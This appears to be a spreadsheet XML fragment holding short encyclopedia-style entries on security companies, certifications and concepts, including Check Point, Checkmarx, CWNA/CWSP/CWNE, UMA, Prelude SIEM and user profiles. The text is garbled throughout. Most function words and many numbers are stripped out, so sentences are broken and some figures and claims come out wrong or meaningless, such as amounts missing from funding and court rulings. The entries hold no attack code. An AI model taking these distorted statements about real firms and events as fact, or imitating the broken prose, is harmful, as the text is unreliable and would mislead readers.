    <t>check point american-israeli multinational provider software combined hardware software products security, including network security, endpoint security, cloud security, mobile security, data security security management. 2021, company approximately 6,000 employees worldwide. headquartered aviv, israel carlos, california, company development centers israel belarus previously held united states (zonealarm), sweden (former protect data development centre) following acquisitions companies owned centers. company offices locations worldwide including main offices north america, united states (including carlos, california dallas, texas), canada (including ottawa, ontario) well europe (london, paris, munich, madrid) asia pacific (singapore, japan, bengaluru, sydney) history check point established ramat gan, israel 1993, shwed (ceo 2016), marius nacht (chairman 2016) shlomo kramer (who left check point 2003). shwed initial idea company's core technology known stateful inspection, became foundation company's first product, firewall-1; soon afterwards also developed world's first products, vpn-1. shwed developed idea serving unit 8200 israel defense forces, worked securing classified networks.initial funding us$250,000 provided venture capital fund group.in 1994 check point signed agreement microsystems, followed distribution agreement 1995. year, u.s. head office established redwood city, california. february 1996, company named worldwide firewall market leader idc, market share percent. june 1996 check point raised million initial public offering nasdaq.in 1998, check point established partnership nokia, bundled check point's software nokia's computer network security appliances.in 2003, class-action lawsuit filed check point violation securities exchange failing disclose major financial information.on august 2003 check point opened branch india's capital, delhi (with legal name check point software technologies india pvt. ltd.). eyal desheh first director appointed india. during first decade 21st century check point started acquiring security companies, including nokia's network security business unit 2009.in 2019, researchers check point found security breach xiaomi phone apps. security flaw reported preinstalled.check point presently focused calls "fifth generation cyber security," “gen identifies fifth generation focused large-scale fast moving attacks across mobile, cloud on-premise networks easily bypass conventional, static detection-based defenses used organizations today.over years many employees worked check point left start software companies. these include shlomo kremer, started imperva; zuk, founded palo alto networks; ruvi kitov reuven harrison tufin; yonadav leitersdorf, founded indeni; shua, founded orca security; july 2020, aryaka confirmed alliance check point software technologies optimize sd-wan system operated aryaka cloud-first, check point cloudguard link cloudguard edge provide optimized protection sd-wan as-a-service. products check point offers following primary products: network security software defined protection public private cloud security zero trust remote access data security security threatcloud threatcloud intellistore virtual systems endpoint security mobile security security management document security (capsule docs product line) zero-day protection (sandblast appliance product line) mobile security (mobile threat prevention product line) acquisitions zone labs, makers zonealarm personal firewall software, 2003, $205 million cash shares. protect data, holding company pointsec mobile technologies, cash deal valued $586m late 2006. prior acquisition check point, protect data acquired reflex software. security, intrusion prevention system developer, million late 2006, following failed plan acquire larger vendor sourcefire. nokia security appliances division acquired april 2009. liquid machines, data security startup company based boston, acquired june 2010. dynasec, provider enterprise governance, risk management, compliance products, acquired november 2011. dynasec offers web-based enterprise application, branded easy2comply, sarbanes-oxley compliance, basel compliance, operational risk management, information security management, hipaa compliance, internal audit management. hyperwise, early-stage startup focused level threat prevention, acquired 2015. lacoon mobile security acquired april 2015. dome9 acquired october 2018. forcenock acquired january 2019 cymplify acquired dec. 2019 protego labs acquired dec. 2019 security acquired sep. 2020 avanan acquired august 2021 spectral acquired february 2022in 2005, check point tried acquire intrusion prevention system developers sourcefire $225 million, later withdrew offer became clear authorities (specifically, committee foreign investment united states would block acquisition. sofaware legal battle sofaware technologies founded 1999, cooperation check point sofaware's founders, ruppin etay bogner, purpose extending check point enterprise market small business, consumer branch office market. sofaware's co-founder ruppin said company wanted make technology simple affordable, lift burden security management users adding features. 2001 sofaware began selling firewall appliances sofaware s-box brand; 2002 company started selling safe@office safe@home line security appliances, check point brand. fourth quarter 2002 sales sofaware's safe@office firewall/vpn appliances increased greatly, sofaware held revenue position worldwide firewall/vpn sub-$490 appliance market, revenue market share.relations check point sofaware founders went sour company acquisition 2002. 2004 etay bogner, co-founder sofaware, sought court approval file shareholder derivative suit, claiming check point transferring funds sofaware required sofaware's products technology. derivative suit ultimately successful, check point ordered sofaware million shekels breach contract. 2006 aviv district court judge ruled bogner sofaware could check point proxy $5.1 million alleged damage sofaware. bogner claimed check point, owned sofaware, behaved belligerently, withheld monies sofaware technology products check point appealed ruling, lost.in 2009 israeli supreme court ruled group founders sofaware, includes bogner, veto power decision sofaware. court ruled three founders could exercise veto power group majority rule. 2011 check point settled litigation relating sofaware. part settlement acquired sofaware shares held bogner ruppin, began process acquiring remaining shares, resulting sofaware becoming wholly owned subsidiary. also check point economy israel silicon wadi references external links corporate website check point research business data check point:</t>
  </si>
  <si>
    <t>Certified software manager</t>
  </si>
  <si>
    <t>certified software manager (csm) professional designation asset management. course developed software publishers association (now siia) 1994 component first global anti-piracy efforts, wasch. 2004,the administration csm, successor class advanced software manager, moved washington, dc-based licenselogic. according itil, software manager defined person manages “…all infrastructure processes necessary effective management, control, protection software assets…throughout stages lifecycle.”the course syllabus walks attendee beginning "what software asset management (sam)?" developing basic asset management program organization.the basis various itam courses. references external links licenselogic</t>
  </si>
  <si>
    <t>Chartbeat</t>
  </si>
  <si>
    <t>chartbeat technology company provides data analytics global publishers. company started 2009 headquartered york city, software service (saas) company integrates code websites publishers, media companies news organizations track users order monetize audience engagement loyalty metrics make decisions content publish promote sites. august 2010, company spun betaworks separate entity. chartbeat praised criticized alternative google analytics real-time data. history betaworks launched chartbeat april 2009 real-time analytics tool that, said, publishers could react quickly changes user behavior. time, google analytics offer real-time data. launch chartbeat part broader strategy betaworks capitalize growth real-time, stream-based, social web. betaworks also invested twitter, tumblr, bit.ly, tweetdeck. august 2010, company spun betaworks separate entity. july 2011, chartbeat launched newsbeat, version service news sites. february 2016, founding tony haile resigned company seven years ceo. long time john saroff named successor. october 2017, chartbeat made updates user experience design, including rebrand flagship product chartbeat publishing. references external links twitter profile</t>
  </si>
  <si>
    <t>User-Managed Access</t>
  </si>
  <si>
    <t>user-managed access (uma) oauth-based access management protocol standard. version standard approved kantara initiative march 2015.as described charter group developed uma, purpose protocol specifications “enable resource owner control authorization data sharing protected-resource access made online services owner’s behalf owner’s authorization autonomous requesting party”. this purpose privacy consent implications applications internet things (iot), explored collection case studies contributed participants standards group. history background kantara initiative's work group held first meeting august 2009. uma's design principles technical design informed previous work microsystems employees, begun march 2008, protocol called protectserve. turn, protectserve influenced goals vendor relationship management movement offshoot effort called feeds-based vrm. protectserve uma's earliest versions leveraged oauth protocol. oauth underwent significant change publication resource authorization protocol (wrap) specification and, subsequently, drafts oauth 2.0, specification kept pace, uses oauth family specifications several protocol flows. depend openid means user identification. however, optionally uses oauth-based openid connect protocol means collecting identity claims requesting party order attempt satisfy authorizing user's access policy. also depend extensible access control markup language (xacml) means encoding user policy requesting policy decisions. dictate policy format, policy evaluation performed internally authorization server (as) perspective. typically xacml would used implement policies inside implementation out-of-scope uma. protocol flows requesting access permission features common xacml protocol. standardization status group conducts work kantara initiative also contributed series internet-draft specifications internet engineering task force (ietf) eventual home standardization work. end, contributed several individual internet-drafts ietf consideration. these, specification oauth dynamic client registration, served input generalized mechanism ultimately developed oauth. presented oauth working group ietf conference march 2019, result specifications adopted ietf. implementation adoption status core protocol several implementations, including several open source implementations. sources active available open-source implementations include forgerock, gluu, identos inc., mitreid connect, atricore, node-uma, roland hedberg, keycloak, wso2 identity server. kantara initiative group working developing "free open-source software (foss), several popular programming languages, empowers developers incorporate protection authorization enablement applications, services, devices".uma-enabled products available gluu, jericho systems, forgerock, identos inc. wso2 identity server comparison oauth diagram (see right) highlights additions makes oauth 2.0. typical oauth flow, human resource owner (ro) operating client application redirected authorization server (as) consent issuance access token client application gain access resource server (rs) ro’s behalf future, likely scoped (limited) fashion. likelihood operating within security domain, communication standardized main oauth specification. adds three main concepts corresponding structures flows. first, defines standardized called protection api, speaks enables multiple rs’s communicate vice versa, secured oauth, allows formal trust establishment pair. this also allows present centralized user interface. second, defines formal notion requesting party (rqp) autonomous enabling party-to-party sharing delegation access authorization. need consent token issuance time policy allowing attempt access asynchronously. third, enables access attempts result successful issuance tokens associated authorization data based process trust elevation rqp, example, gathering identity claims claims them. applicable cases uma's architecture serve variety consumer-facing enterprise-facing cases. group collects case studies wiki.one example cases healthcare consumer health. openid foundation organization, working group called health relationship trust (heart) working "harmonize develop privacy security specifications enable individual control authorization access restful health-related data sharing apis", building upon, among standards, uma. another example cases, originally influenced uma's development, area "personal data stores" fashion vendor relationship management. conception, individual choose operator authorization service accepts connections variety consumer-facing digital resource hosts order offer dashboard resource sharing management capabilities. references external links user-managed access (uma) profile oauth recommendation oauth resource registration recommendation implementations</t>
  </si>
  <si>
    <t>Certified Wireless Security Professional</t>
  </si>
  <si>
    <t>certified wireless security professional (cwsp) advanced level certification measures ability secure wireless network.a wide range security topics focusing 802.11 wireless technology covered coursework exam, vendor neutral. certification track cwsp certification awarded candidates pass cwsp exam also hold cwna certification. cwna certification prerequisite earning cwsp certification. cwsp requirements this certification covers wide range security areas. these include detecting attacks, wireless analysis, policy, monitoring solutions. recertification cwsp certification valid three years. certification renewed retaking cwsp exam advancing cwne also valid years. also professional certification (computer technology) references external links official cwnp site</t>
  </si>
  <si>
    <t>Prelude SIEM (Intrusion Detection System)</t>
  </si>
  <si>
    <t>prelude siem security information event management (siem). tool driving security. prelude siem collects centralize information company's security offer single point view manage thanks logs flows analyzer, prelude siem create alerts intrusions security threats network real-time. prelude siem provides multiple tools forensic reporting data smart data identify weak signals advanced persistent threat (apt). finally, prelude siem embeds tools exploitation phase make works easier operators help risk management. while malicious user software) able evade detection single (nids, hids, etc.), becomes exponentially difficult around defenses multiple protection mechanisms. prelude siem comes large sensors, monitoring different kinds events. prelude siem permits alert collection scale, whether scope covers city, country, continent world. prelude siem siem system capable inter-operating systems available market. implement natively intrusion detection message exchange format (idmef, 4765) format start demanded around world. way, natively idmef compatible opensource ids: auditd, nepenthes, nufw, ossec, pam, samhain, sancp, snort, suricata, kismet, etc. anyone write party sensors available, given prelude siem's open apis libraries. since 2016, "prelude idmef partner program", prelude siem also idmef compatible many commercial ids. prelude siem provides siem functions three modules: alert (sem), analyze archive (sim) true siem alternative market. plus, prelude siem promotes ietf security standards secef project "prelude idmef partner program". history 1998 creation project yoann vandoorselaere: prelude 2002 prelude becomes hybrid 2005 creation company prelude-technologies 2009 society acquires prelude-technologies 2009 become edenwall technologies 18/08/2011 edenwall technologies declared suspended payments, prelude-ids software, company, brand sale. 13/10/2011 (communication systems), edenwall partner, prelude-ids 2012 opening websites: www.prelude-ids.org www.prelude-ids.com (now www.prelude-siem.com) 2012 release version prelude prelude enterprise 2014 release prelude enterprise 2014 prelude becomes prelude siem prelude enterprise becomes prelude 2015 prelude siem received award "france cybersecurity" (french cybersecurity) 2016 prelude siem launch "prelude idmef partner program" 2016 prelude siem (community version) received award community 2017 release prelude siem 4.0, results years research developments efforts 2017 packaging prelude siem available machine virtuelle functions prelude siem collects, normalizes, sorts, aggregates, correlates displays security events regardless types surveillance equipment. beyond capacity processing types event logs (system logs, syslog, flat files, etc.), prelude siem natively compatible many ids. prelude siem main characteristics following: built open-source core (python, light client "agent-less" operation compliant intrusion detection message exchange format (idmef, 4765), incident object description exchange format (iodef, 5070), http, xml, standards smart data smart correlation security events data collect, storage index logs modular, flexible resilient hierarchical decentralized architecture prelude siem community version prelude siem designed scalable simply adapt environment. free, public open-source version (gplv2) small infrastructures, tests educational purposes. open-source version composed following main modules: manager: receives stores alerts database libprelude: connect idmef agents prelude siem libpreludedb: high-speed database insertion module correlator: event correlation module (log management lackey): detect normalize important logs prewikka: graphical user interface (gui)these modules base alert module commercial version. commercial version also adds many functionalities modules scale performances architecture possibilities. prelude siem prelude prelude siem (commercial version) scalable, professionally usable high-performance version prelude, real-world environments. prelude fully scaled version, mainly (security operations center) usage. commercial versions organized like this: prelude siem: siem enterprise modules: alerte, analyse, archive alerte: storage, detection, normalization, correlation, aggregation, real-time notification analyse: analyze, reporting compliance archive: storage, indexation logs flows forensic prelude soc: also prelude siem, possible operational security modules build security operation center (soc) map: real-time cartography parc security indicators. possible drill made physical, logical risk management representations. vuln: vulnerability scanner based openvas. possible inside correlator make cross-correlation asset: asset management based glpi (assets, tickets, workflow, etc.) report: business intelligence reporting. references external links official website prelude siem five questions prelude siem</t>
  </si>
  <si>
    <t>Anomaly-based intrusion detection system</t>
  </si>
  <si>
    <t>anomaly-based intrusion detection system, intrusion detection system detecting network computer intrusions misuse monitoring system activity classifying either normal anomalous. classification based heuristics rules, rather patterns signatures, attempts detect type misuse falls normal system operation. this opposed signature-based systems, detect attacks signature previously created.in order positively identify attack traffic, system must taught recognize normal system activity. phases majority anomaly detection systems consist training phase (where profile normal behaviors built) testing phase (where current traffic compared profile created training phase). anomalies detected several ways, often artificial intelligence type techniques. systems using artificial neural networks used great effect. another method define normal usage system comprises using strict mathematical model, flag deviation attack. this known strict anomaly detection. other techniques used detect anomalies include data mining methods, grammar based methods, artificial immune system.network-based anomalous intrusion detection systems often provide second line defense detect anomalous traffic physical network layers passed firewall security appliance border network. host-based anomalous intrusion detection systems last layers defense reside computer points. they allow fine-tuned, granular protection points application level.anomaly-based intrusion detection network host levels shortcomings; namely high false-positive rate ability fooled correctly delivered attack. attempts made address issues techniques used payl mcpad. also crowdsec collaborative, free software (mit) anomaly-based intrusion detection system. cfengine 'cfenvd' utilized 'anomaly detection' change detection analytics hogzilla free software (gpl) anomaly-based intrusion detection system. rrdtool configured flag anomalies sqrrl threat hunting based netflow collected data references</t>
  </si>
  <si>
    <t>Checkmarx</t>
  </si>
  <si>
    <t>checkmarx global software security company headquartered atlanta, georgia united states. company acquired april 2020 hellman friedman, global private equity firm headquarters francisco. founded 2006, checkmarx integrates automated software security technologies devops. checkmarx provides static interactive application security testing (sast iast), software composition analysis (sca), infrastructure code security testing (kics), application security training development (codebashing).checkmarx's research department known uncovering technical vulnerabilities popular technologies, software, applications, devices. history checkmarx founded maty siman, company's cto, employees. emmanuel benzaquen served since 2006.in 2017, checkmarx acquired codebashing, application security training company. 2018, checkmarx acquired custodela, company provides software security program development well consulting services.in november 2019, company's security research team uncovered number vulnerabilities affecting google samsung smartphones. vulnerabilities allowed attacker take remote control smartphone apps, giving ability take photos, record video conversations, identify phone’s location. research team submitted report android security team google continued provide feedback vulnerabilities addressed.in january 2020, checkmarx detailed multiple security vulnerabilities trifo ironpie robot vacuum. company also uncovered issues amazon alexa, meetup, tinder, among others.in august 2021, checkmarx acquired dustico, software detects backdoors malicious attacks software supply chain. funding checkmarx's early investors include salesforce, remains partner checkmarx provides security reviews salesforce appexchange. 2015, u.s. private equity venture capital firm insight partners acquired checkmarx million.in april 2020, private equity firm hellman friedman, alongside private investment firm tpg, acquired checkmarx $1.15 billion. after acquisition, insight partners retained minority interest company. also security testing references</t>
  </si>
  <si>
    <t>User provisioning software</t>
  </si>
  <si>
    <t>user provisioning software software intended help organizations quickly, cheaply, reliably securely manage information users multiple systems applications. background: systems, applications users people represented user objects login accounts different systems applications. examples systems applications include: ldap directories. microsoft active directory novell edirectory. operating systems linux, unix, solaris, aix, hp-ux windows server. mainframe security products rac/f, acf/2 topsecret. applications r/3, peoplesoft, edwards, lawson financials oracle ebusiness suite. e-mail systems microsoft exchange lotus notes. databases oracle, microsoft server, mysql. variety other, custom vertical-market systems applications..user objects generally consist unique identifier. description person assigned user object—principally name. contact information person, e-mail address, phone numbers, mailing address, etc. organizational information person, manager, department location. password and/or authentication factors.note users need able system application. user object record application entry phone book system, user cannot nonetheless represents user. user objects generally connected parts system application security entitlements. systems, done placing user security groups, users group granted security rights. user lifecycle processes organizations implement business processes create, manage delete user objects systems applications: onboarding: represents steps taken employee hired, contractor starts work, customer partner granted access systems. this term alludes process loading passengers onto commercial airliner. management: users dynamic—they change names, addresses, responsibilities more. changes experienced users physical world must reflected user objects systems applications. support: users sometimes experience problems systems applications. they forget password require security entitlements, example. user support means changing data users systems applications, resetting user passwords resolve user problems. deactivation: users finite lifespan normally even shorter relationship organization system application managed. when users leave—termination, resignation, retirement, contract, customer relationship, etc. access systems applications likewise deactivated.incidentally, term lifecycle imply users deactivated necessarily onboarded again. however, happen. example, employees leave company re-hired later, contractors contract hired employees. user provisioning systems user provisioning systems intended help organizations streamline user lifecycle processes updates user objects systems applications made: more quickly—so users wait changes. more efficiently—to reduce cost managing systems applications response user lifecycle events. more securely—to reduce risk system compromise user objects outlived usefulness, inappropriate security entitlements easily guessed otherwise compromised passwords. user provisioning processes user provisioning system implement processes achieve aforementioned goals. these processes include: auto-provisioning. example: monitor application automatically create users systems applications employee records appear database. auto-deactivation. example: monitor application automatically deactivate users objects systems applications employee records either disappears marked inactive database. automatically deactivate user objects users, contractors, whose scheduled termination date passed. identity synchronization. example: when changes user's e-mail address detected mail system, automatically update user's e-mail address systems. when changes user's name, phone number mailing address detected system, automatically update user's e-mail address systems. self-service profile changes. example: allow users update contact information. self-service access requests. example: allow users request access systems applications. delegated access requests. example: allow managers request access systems applications behalf direct subordinates. authorization workflow. example: business stake-holders review either approve reject proposed changes user profiles access rights. access certification. example: periodically managers verify list direct subordinates still employed organization still report them. periodically data application owners verify list users access data application. user provisioning system components user provisioning system must, general, include following components: connectors, read information users integrated systems applications send updates (e.g., create user, delete user, modify user information) back systems applications. internal database, tracks user objects data integrated systems applications. auto-discovery system, populates internal database using connectors. user interface users review contents internal database, make change requests, approve reject proposed changes, etc. workflow engine, used primarily invite users review either approve reject changes. policy engine, evaluates current user information proposed changes meet corporate rules regulations. reporting engine, helps organizations extract information internal database. references casassa mont, marco; baldwin, adrian; shiu, simon (2009), identity analytics "user provisioning" case study: using modelling simulation policy decision support, hommel, wolfgang; schiffers, michael (2005), supporting virtual organization lifecycle management dynamic federated user provisioning, citeseerx 10.1.1.84.6068 becker, drew, (2005), "overcoming challenges deploying user provisioning/identity access management backbone", technology journal, technology journal (published 2006), (4): 71–79, doi:10.1007/s10550-006-0009-x witty, roberta (2003), identity access management market landscape (pdf),</t>
  </si>
  <si>
    <t>Certified Wireless Network Expert</t>
  </si>
  <si>
    <t>certified wireless network expert (cwne) highest level certification cwnp program started 2001 planet3 wireless. certifies ability design, install, secure, optimize troubleshoot ieee 802.11 wireless networks. certification track cwne credential final step four-level certification process. validates applicant's real-world application principles covered cwnp certification exams, including wireless protocol analysis, security, advanced design, spectrum analysis, wired network administration, troubleshooting. cwne requirements requirements earning cwne certification changed october 2010, cwne exam (pw0-300) retired. requirements cwne certification are: valid current cwsp, cwap, cwdp certifications (requires cwna). three years documented enterprise wi-fi implementation experience. three professional endorsements. current, valid professional networking certifications. documentation three enterprise wi-fi projects participated form word essays. recertification like cwnp certifications, cwne certification valid three years. certification renewed reporting least sixty (60) hours approved continuing education (ce).passing current version either cwsp, cwap, cwdp exam, recertification requirement prior change, worth twenty (20) hours. also professional certification (computer technology) references external links official cwnp site</t>
  </si>
  <si>
    <t>User profile</t>
  </si>
  <si>
    <t>user profile collection settings information associated user. contains critical information used identify individual, name, age, portrait photograph individual characteristics knowledge expertise. user profiles commonly present social media websites facebook, instagram, linkedin; serve voluntary digital identity individual, highlighting features traits. personal computing operating systems, user profiles serve categorise files, settings, documents individual user environments, known ‘accounts’, allowing operating system friendly catered user. physical user profiles serve identity documents passports, driving licenses legal documents used identify individual legal system. user profile also considered computer representation user model. user model (data) structure used capture certain characteristics individual user, process obtaining user profile called user modeling profiling. origin origin user profiles traced origin passport, identity document (id) made mandatory 1920, world passport served official government record individual. consequently, immigration 1924 established identify individual’s country origin. 21st century, passports become highly sought-after commodity widely accepted source verifying individual’s identity legal system.with advent digital revolution social media websites, user profiles transitioned organised group data describing interaction user system. social media sites like instagram allow individuals create profiles representative desired personality image. filling fields profile information necessary create meaningful self-presentation, grants individual control identity wish present displaying meaningful attributes. personal user profile aspect individual's social networking experience, around his/her public identity built. types user profiles user profile format contains information, settings and/or characteristics specific individual. most popular user profiles include photo video sharing websites facebook instagram, accounts operating systems, windows macos physical documents passports driving licenses. social media effectively structured user profiles social media channels instagram facebook offer people form impressions someone predictive similarly meeting offline. condensed format social media profiles allows quick filtering millions profiles matching individuals similar characteristics interests; information provided upon sign research conducted highlights “thin slice” information required form impression individual online (stecher counts 2008). online user profiles eliminate complexity interaction present ‘face-to-face’ meetings behavioural, facial, environmental information, resulting increased predictiveness user personality.dating apps websites solely rely individual’s user profile information provided form interactions communication others platform. despite control presented information, lying minimal online dating contexts (hancock, toma ellison, 2007). apps bumble allow users ‘match’ individuals based characteristics selected filters allow users narrow spectrum search preference. information user’s profile voluntarily specified user includes information height, interests, photographs, gender education. requirement information varies respective platform, surrounds little consensus appropriate amount information condensed user profile. universally, social networking platforms display individual’s profile picture “about page allows self-expression. influencers influencer user profiles third party endorsers shape audience attitudes decisions social media content photos, blogs tweets. social media influencers (smi) often hold significant following social media platform enables recognised opinion leaders shape information influence audience. 'influencer marketing' industry gained prominence 2018, photo sharing instagram crossed billion users, subsequently approximately 60,000 google search queries 'influencer marketing' year. influencer user profiles hold unique selling point, public personality unique charismatic needs wants target audience. profiles advertise product information, latest promotions regularly engage followers maintain online persona. messages endorsed social media influencers often perceived reliable compelling, study conducted found followers inclined follow suggestions favorite influencer. this allows advertisers leverage online user profiles audience rapport target younger niche audiences. according market survey, influencer marketing social media profiles yields return times higher traditional marketing, capable communicating niche segment. most popular influencers include sport starts cristiano ronaldo hollywood personalities dwayne johnson kylie jenner million followers respectively. ecommerce online shopping ecommerce websites amazon information customer’s user profile interests generate list recommended items shop. recommendation algorithms analyse user demographic data, history, favourite artists compile suggestions. store rapidly adapts changing user needs preferences, generation real time results required within half second. profiles naturally limited information algorithms analyse, customer data interaction provides valuable information stored database linked individual profile. user profiles ecommerce websites also serve improve sales sellers individuals recommend products "customers bought item also bought" widen selection buyer. study conducted found user profiles recommendation algorithms significant impact related product sales overall spending individual. process known "collaborative filtering" tries analyse common products interest individual basis views expressed similar behaving profiles. features product ratings, seller ratings comments allow individual user profiles contribute recommendation algorithms, eliminate adverse selection contribute shaping online marketplace adhering amazons zero tolerance policy misleading products. digital user profiles modern software applications account user profiles foundation usable application built. structure layout application menus, features controls often derived user’s selected settings preferences. origin digital user profiles computer systems first initiated windows held user settings information separate environment variable named %userprofile% held framework user’s profile root. consequently, operating systems macos accelerated prominence user profiles 10.0. iterations since made operating system release maximise user friendliness system. features keyboard layouts, time zones, measurement units, synchronisation different services privacy preferences made available setup user account computer types accounts administrator administrator user profiles complete access system permissions. often first user profile system design, allows accounts created. however since administrator account restrictions, highly vulnerable malware viruses, potential impact accounts. guest guest accounts allow people access system limited functionality restrictions modifying apps, settings documents. guest user accounts solve concern providing entire access account individuals. macos, guest profiles require password, however completely controlled parental controls administrative account. features automatic data history deletion session closed, allow guest accounts save disk space user logs off. guest accounts popularly used public services libraries individuals request temporary account complete work research. physical user profiles physical user profiles legal documents passport driving license widely accepted official government record individual’s details. much like digital user profiles, documents outline primary characteristics individual full legal name, birthdate, address portrait picture date expiry. recent history, many user profiles include date expiry date creation indicate legitimacy document and/or encourage renewal maintain accuracy details. countries, requirement valid passport months planned leave country. national identity documents national identity documents documents issued official national authority, part government record. used verify aspects individuals personal identity. government issued documents include birth certificates, drivers licence, marriage certificate, national identity document social security card. format identity documents varies individual country. controversies cambridge analytica scandal 2018 cambridge analytica scandal, surfaced 2018, raised global concerns privacy psychographic profiling algorithms derived user profiles. 2013, aleksandr kogan cambridge analytica developed application "thisisyourdigitallife", operated personality quiz, caveat connecting individual's facebook user profile operate. many news sources documented cambridge analytica's exploitation facebook data algorithm, users gave permissions access "likes", also information contacts friends. amassed data approximating million facebook users harvested exploited legally, predict influence individual voting decisions 2016 presidential election. many users unsettling social media used influence public opinion, leading #deletefacebook campaigns twitter backlash scandal facebook's inability guard privacy invasions. however, research conducted undergraduate students revealed many users believe exchange personal information necessary participate social network thus, despite "breach trust" (zuckerberg, 2018) minimal users left platform permanently. months following mark zuckerberg's (founder) congressional hearing regarding scandal, users made adjustments facebook user profiles changed privacy settings. federal trade commission (ftc) legally required facebook acquire explicit consent user data, alongside disclosing appropriate information third party identity. #deletefacebook movement social media dissatisfaction arise challenges relating misinformation, privacy anti-social behaviours. 'facebooklessness' term coined ongun güder, 2013, considers intentional distancing isolation facebook. #deletefacebook movement arose cambridge analytica scandal 2018, fuelled lack trust service ability protect user information. some reasons intentional distancing time-waste, reducing distraction, privacy concerns, seeking relationships coping lost relationships. movement away facebook less time gush, steady trickle course. some users adapted deactivating profiles (which reactivated later), others permanently unretrievably deleting accounts. many users, deactivating reactionary temporary response scandal, social needs constant connectedness relationships introduced imperatives stay. references also internet privacy identity documents online identity online identity management personally identifiable information mining social media</t>
  </si>
  <si>
    <t>Avast SecureLine VPN</t>
  </si>
  <si>
    <t>avast secureline service developed czech cybersecurity software company avast. available android, microsoft windows, macos, android operating systems.the automatically turn user connects public wi-fi. functionality similar vpns, secureline works making user appear different place changing users address, bypassing internet censorship country user wi-fi user using. automatically turn user connects public wi-fi.security features avast secureline include: 256-bit advanced encryption standard, single shared leak protection, kill switch, smart connection rules. server locations avast egress servers cities world-wide. servers eight cities support connections protocols like bittorrent servers dedicated users streaming services. also comparison virtual private network services information privacy internet privacy references external links official website</t>
  </si>
  <si>
    <t>Certified Wireless Network Administrator</t>
  </si>
  <si>
    <t>certified wireless network administrator (cwna) foundation level certification cwnp measures ability administer wireless lan. wide range topics focusing 802.11 wireless technology covered coursework exam, vendor neutral. certification track certified wireless network administrator (cwna) foundation level wireless certification certified wireless network professional (cwnp) program. cwnp next offers three professional level certifications: certified wireless security professional (cwsp), certified wireless analysis professional (cwap) certified wireless design professional (cwdp). candidate achieve expert level cwne certification earning cwna, cwsp, cwap cwdp certifications. candidate longer pass exam expert level certified wireless network expert (cwne) certification. addition passing cwna, cwsp, cwap cwdp candidate must also provide: professional endorsements, years documented enterprise wi-fi experience, current valid networking certifications documentation enterprise wi-fi projects candidate participated led. cwna requirements main subject areas covered cwna follows: radio technologies antenna concepts wireless hardware software network design installation management wireless standards organization 802.11 network architecture wireless security troubleshooting perform site surveysthese subjects covered introductory level cwna coursework examination. certifications specialize subjects. recertification cwna certification valid three years. certification renewed retaking cwna exam passing professional level certification exams (cwsp, cwap cwdp). also professional certification (computer technology) references external links official websitesybex publishing study guide: https://www.wiley.com/go/cwnasg</t>
  </si>
  <si>
    <t>Certified Software Development Professional</t>
  </si>
  <si>
    <t>certified software development professional (csdp) vendor-neutral professional certification software engineering developed ieee computer society experienced software engineering professionals. this certification offered globally since 2001 dec. 2014. certification program constituted element computer society's major efforts area software engineering professionalism, along ieee-cs software engineering 2004 (se2004) undergraduate curricula recommendations, guide software engineering body knowledge (swebok guide 2004), completed years later. development elements, facilitate global portability software engineering certification, since 2005 2008 international standard iso/iec 24773:2008 "software engineering certification software engineering professionals comparison framework" developed. (please, overview iso/iec jtc1 ieee standardization effort article published stephen seidman, csdp. standard formulated way, allowed recognize csdp certification scheme basically aligned soon standard's release date, 2008-09-01. several later revisions csdp certification undertaken making alignment complete. 2019, iso/iec 24773:2008 withdrawn revised iso/iec 24773-1:2019 certification initially offered ieee computer society experienced software engineering software development practitioners globally 2001 course certification examination beta-testing. csdp certification program officially approved 2002. after december 2014 certification program discontinued, issued certificates recognized valid forever. number similar certifications introduced ieee computer society, including professional software engineering master (psem) professional software engineering process master (psepm) certifications (the later soon discontinued). become certified software development professional (csdp) candidates four years (initially years) professional software engineering experience, pass three-and-half-hour, 180-question examination various knowledge areas software engineering, possess least bachelor's degree computer science software engineering. csdp examination tested candidates' proficiency internationally accepted, industry-standard software engineering principles practices. csdp credential holders also obligated adhere ieee/acm's software engineering code ethics professional practice. 2021, ieee-cs offer successor csdp professional software engineering master (psem) certification. exam three hours, proctored remotely, consists questions swebok knowledge areas: software requirements, software design, software construction, software testing, software maintenance, software configuration management, software engineering management, software engineering process, software engineering models methods, software quality, software engineering economics.(there also professional software developer (psd) certification, covers knowledge areas: software requirements, software design, software construction, software testing. similarity name certification csdp confusing, reputable credential equivalent csdp.) history ieee computer society introduced csdp 2002, october 2008, became first certification conform iso/iec 24773 standard software engineering certification.) determination eligibility candidates undergo peer review education professional qualifications order receive authorization take csdp examination. candidates therefore submit application ieee computer society provided verifiable information regarding educational background professional experience. certified software development associate (csda) certification available graduating students early-career software professionals meet eligibility requirements csdp. csdp examination content csdp examination content based guide software engineering body knowledge. examination covered content primary knowledge areas swebok guide version below list topics tested terms proportion total examination. software requirements software design software construction software testing software maintenance software configuration management software engineering management software engineering process software engineering methods software quality software engineering professional practice software engineering economics computing foundations mathematical foundations engineering foundations external links ieee computer society certification home: software professional certification program references</t>
  </si>
  <si>
    <t>Anonplus</t>
  </si>
  <si>
    <t>anonplus social networking service developed anonymous. announced july 2011, your anon news banned google+. anonymous defined anonplus "new social network fear...of censorship...of blackout...nor holding back." anonplus's goal create decentralized secure social network privacy users valued. attack anonplus july 2011, anonplus hacked rival group hackers, apparently based turkey. anonplus's main webpage replaced image wearing suit, mocking normal anonymous logo, messages turkish english. days later, defaced second time rival hacking group syrian electronic army. current state social networking site since abandoned. website updated november 2011 press release mentioned project entered invite-only beta phase. according document, project entered beta phase november 2011. document also explained become goal project target censorship. since point, domain expired mention made project social media outlets. references external links official website official forum</t>
  </si>
  <si>
    <t>3D security</t>
  </si>
  <si>
    <t>security framework promoting development, diplomacy, defense security strategies. security framework recognizes security challenges like terrorism, nuclear proliferation, global warming, sars avian epidemics require variety tools addressing complex threats. these tools categorized broadly headings development, diplomacy defense; security. security “whole government” approaches promoted countries like canada u.k. number years. bi-partisan congressional leaders bush administration promote security vision rethinking security detailed 2006 national security strategy. development refers governmental nongovernmental (ngo) efforts build economic, social, political foundations stable communities societies. diplomacy refers communication negotiation people solve shared problems address conflicts political legal channels. official state department negotiations (track unofficial diplomacy (track religious, business, academic, civil society leaders work best parallel tracks resulting agreements legitimate, widely supported, sustainable. defense refers wide range military tasks including waging war, peacekeeping coordinating disaster response. resources defense, development, diplomacy (3d): canadian u.s. military perspectives</t>
  </si>
  <si>
    <t>Certified in Risk and Information Systems Control</t>
  </si>
  <si>
    <t>Certified Social Engineering Prevention Specialist</t>
  </si>
  <si>
